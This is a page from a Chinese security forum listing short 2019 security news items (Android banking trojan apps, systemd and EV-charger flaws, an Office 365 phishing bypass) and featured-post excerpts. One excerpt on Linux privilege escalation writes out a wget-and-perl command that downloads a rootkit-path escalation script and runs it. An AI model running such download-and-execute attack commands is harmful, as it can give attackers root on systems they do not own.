Google Play 里的恶意应用利用手机运动传感器隐藏自己

趋势科技的研究人员报告了两个 Google Play 应用只在检测到手机移动时才会安装 Anubis 银行木马,Anubis 会利用按键记录器和屏幕截图的方式窃取用户的登录凭证。这两个应用其一是 BatterySaverMobi,安装量 5000 左右,另一个是 Currency Converter,安装量未知,Google 在收到报告之后已经将其移除。 ...

2019-01-19 01:08:35 0 25

黑客可利用安全漏洞控制电动汽车充电站

据外媒报道,如果近日发现的施耐德电气EVlink Parking充电站漏洞被黑客利用,电动汽车车主将会无法给汽车充电。  据了解,目前多个国家的办公楼、酒店和超市附近均配备施耐德电气的EVlink Parking充电站。施耐德电气表示,各充电站的管理人员需要注意,如果当前充电站的固件版本是3.2.0-12_v1及之前的版本,建议充电站安 ...

2019-01-17 10:31:18 1 177

Systemd 曝出三个漏洞 绝大部分 Linux 发行版易受攻击

Linux 系统与服务管理工具 Systemd 被曝存在 3 大漏洞,影响几乎所有 Linux 发行版。Systemd 是 Linux 系统的基本构建块,它提供了对系统和服务的管理功能,以 PID 1 运行并启动系统的其它部分。目前大部分 Linux 发行版都以 Systemd 取代了原有的 System V。安全公司 Qualys 近日发布报告称其发现 Systemd 中存在 3 个安全 ...

2019-01-15 23:30:20 2 281

Imperva:2018 Web 应用漏洞数量比 2017 增加了 21%

Imperva 昨日发布了“ 2018 Web 应用漏洞现状”报告。数据显示,2018 年发现的 Web 应用新漏洞共 17,142 个,比 2017 年增加了 21% ,相比 2016 年增加了 159% 。其中有超过一半的漏洞可被黑客公开利用,有超过 1/3 的漏洞暂时还没有可用的解决方案。CMS 方面,WordPress 的漏洞数量持续增加。Drupal 虽然数量低于 WordPr ...

2019-01-15 20:22:35 3 232

黑客使用零宽度空格绕过Office 365的保护

据外媒报道,微软最近修复了Office 365的一个漏洞,黑客之前利用这个漏洞绕过钓鱼保护,将恶意信息发送到受害者邮箱中。该漏洞与电子邮件原始HTML中的恶意URL中使用的零宽度空格(ZWSP)有关。黑客通过分割URL的方法,使得防御系统不能检测到恶意信息。  专家指出,使用这种技术可以绕过URL信誉检查和安全链接保护。由于这 ...

2019-01-14 09:02:32 0 418

深度揭秘:美国电网存“后门” 俄罗斯黑客随意进出

据国外媒体报道,2017年3月的一天早上,迈克·维泰罗(Mike Vitello)的工作电话响了。客户想了解他们刚刚收到的一封奇怪电子邮件的更多信息。维泰罗想签的协议是什么?附件在哪里?维泰洛先生不知道他们在说什么。他工作的俄勒冈州建筑公司“全方位挖掘美国公司”( All-Ways Excavating US)进行了检查。他们告诉维特洛的 ...

2019-01-11 21:12:41 0 421

热门活动

T00ls专家

Twi1ight

荣誉会员

文章33篇,精华11篇

1

zcgonvh

荣誉会员

文章22篇,精华10篇

2

Bypass

荣誉会员

文章20篇,精华5篇

3

backlion

注册会员

文章29篇,精华3篇

4

ph12h0n

荣誉会员

文章36篇,精华3篇

5

lostwolf

注册会员

文章130篇,精华2篇

6

alibaba

注册会员

文章22篇,精华2篇

7

宝宝

注册会员

文章51篇,精华2篇

8

Mir4cl3

注册会员

文章37篇,精华2篇

9

4ido10n

注册会员

文章18篇,精华2篇

10

最新精华

渗透测试网站->c段->机房->设备->服务器->ok

网站->c段->机房->设备->服务器->ok又是每个季度限号期了,赶紧 ...

2018-11-13 18:22:22 145 3819

渗透测试Linux应急响应及实战演练

#0x00 前言​当企业发生黑客入侵、系统崩溃或其它影响业务正常运 ...

2018-10-13 12:10:56 72 1769

渗透测试window应急响应及实战演练

#0x00 前言​当企业发生黑客入侵、系统崩溃或其它影响业务正常运 ...

2018-10-13 11:45:51 68 1665

渗透测试通过代码审计拿下境外某网站

某日无聊,想着搞个网站玩玩,就在google上随便找了一个,结果发 ...

2018-09-22 19:00:02 31 1511

linux 自动提权perl脚本

经常看到有人求linux各种版本的 exp 共享下国外发现的一个自动化脚本 (貌似 linux版块木有权限 就发这里得了) 地址 [url]http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt[/url] 使用demo[code]yaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt -O root.plyaseng@UAUC:~$ perl root.plyaseng@UAUC#:help----------- ...

贝因美(beingmate.com)某分站sql注入漏洞

根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询admin@t00ls.net!

Top ↑